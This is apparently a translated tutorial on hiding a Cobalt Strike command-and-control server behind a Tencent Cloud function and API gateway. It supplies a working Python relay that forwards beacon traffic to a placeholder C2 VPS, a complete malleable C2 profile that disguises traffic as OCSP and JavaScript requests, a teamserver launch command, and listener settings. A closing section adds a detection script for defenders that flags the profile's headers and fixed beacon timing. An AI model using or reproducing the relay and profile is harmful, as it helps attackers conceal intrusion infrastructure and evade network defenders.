Hiding C2
This_is_Y Lv6

Reference: https://mp.weixin.qq.com/s/sEzUenuP6lKQVcrDK_sxAw

Create the cloud function

https://console.cloud.tencent.com/scf/list?rid=1&ns=default
Click New, then select Custom, Event function, Code deployment, and Python 3.6.
Code:

```python
# coding: utf8
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2='你的vpsIP'  # placeholder: your VPS IP
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False)
        else:
            params=event['queryString']
            resp=requests.post(C2+path,data=event['body'],headers=headers,params=params,verify=False)
        print(resp.headers)
        print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response
```


Configure the trigger

Open the function, go to Trigger Management, create a trigger, and choose API Gateway trigger as the trigger method.

Configure the API gateway

After the trigger is configured, click into it and choose Edit.
Just change the path, then save and publish.
Click into it again; the public domain name shown alongside is the domain to use later when creating the listener in CS.

C2profile

```
set sample_name "t";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/octet-stream";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}
```

Save it, then start the teamserver with this file:

```
./teamserver IP password xxx.profile
```

Create the listener

As shown in the screenshot:

image-20210728145217125

A few things to watch when creating it:

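  1. When filling in HTTP Hosts, trim both ends: delete the leading http:// and the trailing :80.
  2. Because Tencent Cloud only provides ports 80 and 443, the listener port can only be 80 or 443, matched one-to-one.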
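
For defenders, the profile above leaves a fixed request-side fingerprint, and `sleeptime "3000"` with `jitter "0"` makes the check-ins strictly periodic. The following is an added example, not code from the original post, that scores proxy-log records against those traits; the record schema, the `make_record` helper, the `gateway.example` host and the sample records are constructed assumptions.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev

# Request-side traits copied from the profile on this page.
PROFILE_UA = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)"
B64 = r"[A-Za-z0-9+/]+={0,2}"
COOKIE_RULES = {  # (method, uri) -> the whole Cookie header the profile produces
    ("GET", "/api/x"): re.compile(rf"SESSIONID={B64}"),
    ("POST", "/api/y"): re.compile(rf"JSESSION={B64}"),
}
SLEEP_S = 3.0  # set sleeptime "3000" (milliseconds) with jitter "0": fixed interval

def profile_hits(rec):
    """Return the profile traits that one request record (assumed dict schema) shows."""
    hits = []
    if rec["ua"] == PROFILE_UA:
        hits.append("user-agent")
    rule = COOKIE_RULES.get((rec["method"], rec["uri"]))
    if rule and rule.fullmatch(rec["cookie"]):
        hits.append("cookie")
    return hits

def find_beacons(records, min_requests=4, tolerance=0.25):
    """Flag (client, host) pairs whose GET check-ins repeat every ~SLEEP_S seconds."""
    groups = defaultdict(list)
    for rec in records:
        if rec["method"] == "GET" and "cookie" in profile_hits(rec):
            groups[(rec["client"], rec["host"])].append(rec["ts"])
    flagged = []
    for key, stamps in sorted(groups.items()):
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if (len(stamps) >= max(min_requests, 2) and pstdev(gaps) <= tolerance
                and abs(mean(gaps) - SLEEP_S) <= tolerance):
            flagged.append(key)
    return flagged

def make_record(client, ts, method, uri, cookie, ua=PROFILE_UA):
    """Hypothetical helper: build one proxy-log record in the assumed schema."""
    return {"client": client, "host": "gateway.example", "ts": ts,
            "method": method, "uri": uri, "cookie": cookie, "ua": ua}

# Constructed sample records (not real traffic): one periodic client, one irregular.
SAMPLE = (
    [make_record("10.0.0.5", t, "GET", "/api/x", "SESSIONID=Y29uc3RydWN0ZWQ=") for t in (0, 3, 6.1, 9, 12)]
    + [make_record("10.0.0.5", 12.4, "POST", "/api/y", "JSESSION=MTIzNDU=")]
    + [make_record("10.0.0.7", t, "GET", "/api/x", "SESSIONID=YWJj", ua="curl/8.0") for t in (0, 40, 45, 200)]
)
```

Only the periodic client is flagged by `find_beacons(SAMPLE)`; the second client sends a cookie of the same shape but at irregular intervals, which is why the interval check is combined with the header match.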